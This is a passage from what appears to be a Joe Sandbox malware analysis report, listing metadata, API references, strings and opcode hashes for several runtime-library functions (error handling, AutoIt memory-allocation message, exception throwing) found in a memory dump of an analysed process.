                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$exp
                                                                                                                    • API String ID: 1757819995-2878093337
                                                                                                                    • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                                    • Instruction ID: a4b82f03b87aac1edba524b3453c50e96abe28b90673b82f185370bef1203eff
                                                                                                                    • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                                    • Instruction Fuzzy Hash: 0601C876928B8883E220CF24D4452AF77B1FFEA348F241315E7442AA60CB7ED485DB00
                                                                                                                    Function 00007FF65604C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                    • Opcode ID: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                                                                    • Instruction ID: 3445d69b7e37c131f46478214601b073f0b373371bb885944d43b5a8d781610e
                                                                                                                    • Opcode Fuzzy Hash: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                                                                    • Instruction Fuzzy Hash: 52F0E520B1834642FB686756F3453B922529F487D4F9C5431D94DEBB9ACDBED8C9C700
                                                                                                                    Function 00007FF6560075C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 00007FF6560075E9
                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FF656007241,?,?,?,?,00007FF65600660C,?,?,?,?,00007FF656004CD3), ref: 00007FF656007600
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Valuetry_get_function
                                                                                                                    • String ID: FlsSetValue
                                                                                                                    • API String ID: 738293619-3750699315
                                                                                                                    • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                                    • Instruction ID: 5e0631f55de62eb99662150b472cf3fe86bbd839bc6d89f1805f4e21d1e1a7d6
                                                                                                                    • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                                    • Instruction Fuzzy Hash: 4EE06561A0854281FE094F55F6044B52362BF48B99F8C4031E90E97295DE3ED98CC641
                                                                                                                    Function 00007FF656005620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656005629
                                                                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF65600563A
                                                                                                                      • Part of subcall function 00007FF656007018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65600563F), ref: 00007FF65600708D
                                                                                                                      • Part of subcall function 00007FF656007018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65600563F), ref: 00007FF6560070BF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID: Unknown exception
                                                                                                                    • API String ID: 3561508498-410509341
                                                                                                                    • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                    • Instruction ID: 5d9443ec62fb8e0d09aa4ae8743f4f6428b3e4e0b4c7ef0031ecc4ce0dd038c6
                                                                                                                    • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                    • Instruction Fuzzy Hash: 69D05E26A18986D1EF10EF04DA983A8A330FB80308FD84431E24DD25B2EF2ED64ED300